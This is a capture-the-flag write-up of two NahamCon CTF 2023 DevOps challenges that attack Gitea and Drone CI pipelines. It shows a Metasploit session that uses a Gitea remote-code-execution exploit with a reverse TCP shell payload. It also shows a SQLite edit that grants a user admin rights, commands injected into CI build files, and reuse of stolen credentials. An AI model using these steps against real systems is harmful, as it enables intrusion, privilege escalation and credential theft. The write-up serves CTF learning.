NahamCon CTF 2023 Devops Challenge Writeup
Devops Challenge Writeup, Pirates and Supplier writeup.
NahamCon is a free virtual offensive security conference, hosted on Twitch and they also make a CTF called Nahamcon CTF 2023.
NahamCon CTF always delivers good challenges for CTF enthusiasts like me. This year, I didn’t participate much in categories other than the DevOps category. There were only two DevOps challenges this year, and I hope to see more next year.
This year me and my team in Vantage Point Security Indonesia got 10th on the scoreboard.
I wrote this writeup after seeing another writeups on the discord. After read some of them, I can say my approaches are little bit different. These 2 challenges use Gitea as the base of the application.
Pirates (medium)
You are given some URLs, a username, and a password for the Gitea application. After logging in, you will find a repository named Tortuga.
My attention goes straight to the drone.yml
file.
---
kind: pipeline
type: exec
name: to pirate
platform:
os: linux
arch: amd64
steps:
- name: to pirate
commands:
- ./piratize.sh
trigger:
event:
- push
branch:
- main
---
kind: signature
hmac: 213aae557e24814352839440ca22083810dfd95237da16e573115ca050823ac6
...
the summary is steps
will be executed whenever there is a push into branchmain
.
edit piratize.sh
to:
#! /bin/sh
cat /flag.txt
pirate README_ENG.md > README.md
git add README.md
git commit -m "Automatic translation [CI SKIP]"
git push --set-upstream origin main
create a new branch and create a pull request,
but an error is stopping me.
This Pull Request doesn’t have enough approvals yet. 0 of 1 approvals granted.
The pipeline will not run until there is a merge into the main
branch, so in order to merge the code, we must have at least 1 approval.
Exploit Phase
What I do was exploit the Gitea instance with CVE-2022–30781
There are 2 ways to exploit this CVE, the hard way and the simple way, so the hard way will be recreate HTTP service manually. Configure the endpoint to pretend to be a Gitea instance.
for example:
Request -> /api/v1/version
Response -> {“version”: “1.16.0”}
reference:
the easier way will be using metasploit installed in a server, for this definitely you need a VPS
msf6 > use exploit/multi/http/gitea_git_fetch_rce
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RPORT 30299
RPORT => 30299
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RHOSTS challenge.nahamcon.com
RHOSTS => challenge.nahamcon.com
msf6 exploit(multi/http/gitea_git_fetch_rce) > set USERNAME jack
USERNAME => jack
msf6 exploit(multi/http/gitea_git_fetch_rce) > set PASSWORD Bu7!^zTZ
PASSWORD => Bu7!^zTZ
msf6 exploit(multi/http/gitea_git_fetch_rce) > set PAYLOAD linux/x64/shell/reverse_tcp
PAYLOAD => linux/x64/shell/reverse_tcp
I found gitea database and configuration located under /data/gitea
gitea.db is a SQLite3 format file
so I extract the db file and see it using https://sqliteonline.com/
update user jack
into admin role
sqlite3 gitea.db
UPDATE user SET is_admin='1' WHERE id=4;
.exit
refresh the page
as an Admin , jack can merge the pull request
Go to http://drone.challenge.nahamcon.com:30299/
Solved
Post Exploitation Phase
Do reverse shell on the runner server
I do some recon and found this credential, later on this credential can be used on Supplier
challenge
droneci:t4K0@s!qSF
Supplier (hard)
You are given some URLs, a username, and a password for the Gitea application. After logging in, you will find a repository named infra.
My attention goes straight to the drone.yml
file, so I can learn how this pipeline work.
kind: pipeline
type: exec
name: default
platform:
os: linux
arch: amd64
trigger:
event:
- cron
steps:
- name: tf_plan
commands:
- make plan
So there are already a cron job to triggered the steps, so what we want to exploit is try to change the content of Makefile
so when the event triggered then the payload will be executed trough make plan
command.
Exploit phase
I tried to edit the Makefile
, but I can’t because the repository settings require that we must fork it and possibly make a pull request.
Try to fork, but I got this error
The owner has already reached the limit of 0 repositories.
In order to solve this issue, I tried a different approach. I thought maybe the creator of this challenge didn’t change the droneci credential in all devops challenge. And my though worked out perfectly!
this is what I found before in Pirates
challenge
droneci:t4K0@s!qSF
so droneci user can directly commit into the repository, just add cat /flag.txt
into Makefile
Solved
That’s it, I hope you learn something from this simple writeup. Thank you for reading !